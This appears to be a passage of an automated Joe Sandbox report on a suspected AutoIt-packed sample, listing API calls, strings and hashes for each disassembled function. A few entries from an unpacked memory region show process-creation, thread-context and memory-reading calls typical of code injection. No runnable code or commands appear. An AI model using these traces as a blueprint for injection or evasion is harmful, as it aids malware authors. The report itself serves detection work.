                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                              • String ID:
                                                                              • API String ID: 1500180987-0
                                                                              • Opcode ID: bb1147ec7c9e4a8a2e1b2febcbde42ff54d7ea5c84e3de9f37913cebb94ce0e8
                                                                              • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                                              • Opcode Fuzzy Hash: bb1147ec7c9e4a8a2e1b2febcbde42ff54d7ea5c84e3de9f37913cebb94ce0e8
                                                                              • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                              • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                              • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                              • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                                              • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                              • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                              • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                              • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                              • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                                              • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                              • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

                                                                               Control-flow Graph (function entry 0040708B)
                                                                              APIs
                                                                                • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                                                • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                                              • _wcscat.LIBCMT ref: 0043E9A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                              • API String ID: 2673923337-2727554177
                                                                              • Opcode ID: 436606bc39e4e285cc41a643d5592b489ca647995d37ef15f881fbd26025604c
                                                                              • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                                              • Opcode Fuzzy Hash: 436606bc39e4e285cc41a643d5592b489ca647995d37ef15f881fbd26025604c
                                                                              • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

                                                                               Control-flow Graph (function entry 00403633)
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                                              • KillTimer.USER32(?,00000001), ref: 004036FC
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                                              • CreatePopupMenu.USER32 ref: 0040373E
                                                                              • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                              • String ID: TaskbarCreated$%I
                                                                              • API String ID: 129472671-1195164674
                                                                              • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                              • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                                              • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                              • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                              • LoadIconW.USER32(00000063), ref: 00403A76
                                                                              • LoadIconW.USER32(000000A4), ref: 00403A88
                                                                              • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                              • RegisterClassExW.USER32(?), ref: 00403B16
                                                                                • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$AutoIt v3
                                                                              • API String ID: 423443420-4155596026
                                                                              • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                              • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                                              • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                              • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7f6f2324796d7790dc190cd7c1dfa3a015b29290d370379cfab0862c9caf5947
                                                                              • Instruction ID: 23538c107c6dfdca67d2b7b1c4c7e94ef4fcc681592757ceee35ff99e5705119
                                                                              • Opcode Fuzzy Hash: 7f6f2324796d7790dc190cd7c1dfa3a015b29290d370379cfab0862c9caf5947
                                                                              • Instruction Fuzzy Hash: A9A2C032D4D3808FD735CB18C8547AABBF1AFC5398F89491ED29997296D335A804CB93

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                                              • API String ID: 1825951767-3937808951
                                                                              • Opcode ID: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                              • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                                              • Opcode Fuzzy Hash: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                              • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                              • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                              • String ID: <WL$\TL$%I$SL
                                                                              • API String ID: 1986988660-4199584472
                                                                              • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                              • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                                              • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                              • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00A8AA19
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A8AC3F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                              • Instruction ID: 085e7d96a0db3f7d60a8356cdda25af9825dc2c72627091be376ccc1d64f56f0
                                                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                              • Instruction Fuzzy Hash: 34A10770E00209EBEB14DFA4C998BAEBBB5BF58304F20815AE505BB280D7759E81CB55

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                              • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                                              • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                              • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00A8A5E8: Sleep.KERNEL32(000001F4), ref: 00A8A5F9
                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A8A840
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: NAYPPKBZ6A
                                                                              • API String ID: 2694422964-955315063
                                                                              • Opcode ID: 3a1cff76626631442c4a4b339ffdf59a3a52fc96c93eb7c805511a4df0e5d414
                                                                              • Instruction ID: 2f96694428e68a826c53326640bc4a8484b58727c5bd31f36eb69027b42a44bc
                                                                              • Opcode Fuzzy Hash: 3a1cff76626631442c4a4b339ffdf59a3a52fc96c93eb7c805511a4df0e5d414
                                                                              • Instruction Fuzzy Hash: 40518330E14248EBEF10EBF4C855BEEB775EF68700F104159E609BB2C0D6BA5A45CB66

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              • _memset.LIBCMT ref: 004040FC
                                                                              • _wcscpy.LIBCMT ref: 00404150
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                              • String ID: Line:
                                                                              • API String ID: 3942752672-1585850449
                                                                              • Opcode ID: 1bad5c4e2ddd4e6fd89135438c19b354787e2bb84470972a128f45ab23fe358d
                                                                              • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                                              • Opcode Fuzzy Hash: 1bad5c4e2ddd4e6fd89135438c19b354787e2bb84470972a128f45ab23fe358d
                                                                              • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00A89DA3
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A89E39
                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00A89E5B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454454014.0000000000A88000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A88000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a88000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                              • Instruction ID: 24ca68a434bfceca250770321b9e1e2c874e68c808d49727a6508d28d78a4986
                                                                              • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                              • Instruction Fuzzy Hash: 9362FB30A146589BEB24DFA4C845BEEB376FF58300F1091A9D10DEB390E7759E81CB5A
                                                                              APIs
                                                                                • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                              • _free.LIBCMT ref: 0043E263
                                                                              • _free.LIBCMT ref: 0043E2AA
                                                                                • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                              • API String ID: 2861923089-1757145024
                                                                              • Opcode ID: 69c7a8ba5b0d83681772c04a7f4adaaf13fb23c1c272ad725c34919c60715dbb
                                                                              • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                                              • Opcode Fuzzy Hash: 69c7a8ba5b0d83681772c04a7f4adaaf13fb23c1c272ad725c34919c60715dbb
                                                                              • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                                              • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
